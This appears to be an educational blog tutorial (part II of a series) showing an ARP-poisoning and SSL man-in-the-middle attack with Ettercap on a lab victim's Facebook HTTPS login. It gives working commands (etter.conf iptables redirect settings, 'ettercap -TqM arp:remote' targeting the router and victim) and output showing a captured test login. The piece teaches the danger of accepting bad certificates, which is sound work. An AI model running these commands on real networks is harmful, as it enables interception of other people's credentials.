During the last article,
ARP poisoning (I), you were able to learn the risks of using non-secure protocols inside an unreliable network. At any moment, your connection credentials can be captured by any intruder and you will not be aware of that. Note that this situation can be very common when you surf the Internet and go to HTTP websites, or for example, when you log into your MSN account.
So what happens with secure protocols such as HTTPS? That is to say, for instance when you access your online bank account, PayPal, Gmail, LinkedIn and so on. Are you safe? In most cases, that will depend on you.
Let's go over the normal behavior of a secure site like Facebook. If you click with the left mouse button on facebook.com (in the web browser bar, once you have opened the site), you will be able to appreciate that the connection to the web is encrypted and verified by DigiCert Inc (certification authority).
By pressing on the
More Information button, you may take a look at the features of the digital certificate offered by Facebook. As you can pick out in the first screen, the certificate has been issued by DigiCert Inc to Facebook, and in the second one, it is made up by a valid Certificate Hierarchy.
Now we are going to use another audit tool: Ettercap (NG-0.7.3). This program is aimed at sniffing switched LANs, by supporting active and passive analysis of many protocols (HTTP, FTP, POP, IMAP, NFS, etc.), even ciphered ones.
In addition, it includes many options for network and host inspection, data injection in an established connection, lots of loadable modules at runtime, also known as plugins (arp_cop - report suspicious ARP activity -, dos_attack - run a DoS against a victim -, finger - fingerprint a remote host -, etc.), several MitM attacks (ARP poisoning, ICMP redirection, DHCP spoofing and port stealing) and so on.
The
victim computer is going to open Facebook (HTTPS) through a web browser (Firefox). Therefore, the
victim will go out across the
router so as to reach Facebook via Internet.
Ettercap will be utilized in order to poison both elements,
victim and
router, to sniff all traffic between them. So how can the
attacker capture the password, whether this one is sent out through the secure channel previously set up? First up, the traffic between the
victim and Facebook is not going directly to the
router, but that it will pass through the
attacker, which will be picking up all data.
Thereby, on the one hand the
attacker will establish an HTTPS connection between itself and Facebook by using the correct certificate issued by Facebook, and on the other, another HTTPS connection between itself and the
victim, but this time, by means of a fake certificate created on the fly and which will have all fields filled according to the real certificate presented by Facebook.
Let's get started by editing the configuration file of Ettercap, in order to enable the iptables command to allow the TCP redirection at kernel level, so as to be able to handle SSL dissection.
root@attacker:~# aptitude install ettercap
root@attacker:~# cat /etc/etter.conf
...
[privs]
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default
...
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
...
Now we are ready to run Ettercap by spoofing both targets and activating the ARP poisoning MitM attack. The 'remote' parameter is set in order to capture the connections which pass through the router, otherwise just the connections between them would be catched.
root@attacker:~# ettercap -TqM arp:remote /192.168.1.1/ /192.168.1.10/
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Listening on eth0... (Ethernet)
eth0 -> 00:0C:29:20:9F:9B 192.168.1.20 255.255.255.0
Privileges dropped to UID 0 GID 0...
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Scanning for merged targets (2 hosts)...
* |==================================================>| 100.00 %
2 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : 192.168.1.1 00:60:B3:50:AB:45
GROUP 2 : 192.168.1.10 00:0C:29:69:81:47
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
At this moment, if you open Facebook again, Firefox will warn you that it cannot confirm that the connection is secure. Normally, when you try to connect securely, sites such as banks, stores, public organisms, etc., present trusted identifications to prove that you are going to the right place.
If you confirm the security exception and accept the digital certificate, you will have fallen into the trap of the
attacker. Let's review the characteristics of this invalid certificate, so as to be able to compare it with the real certificate (second figure).
As you can make out in the general features of the fake certificate, only the fingerprints are modified, because of the
attacker has signed it with him private key. Besides, the undependable certificate does not present a correct hierarchy.
Now if you attempt to login into Facebook, your credentials will be catched by the
attacker.
root@attacker:~# ettercap -TqM arp:remote /192.168.1.1/ /192.168.1.10/
...
Text only Interface activated...
Hit 'h' for inline help
HTTP : 69.171.224.39:443 -> USER: test@mytest.com PASS: test1 INFO: https://www.facebook.com/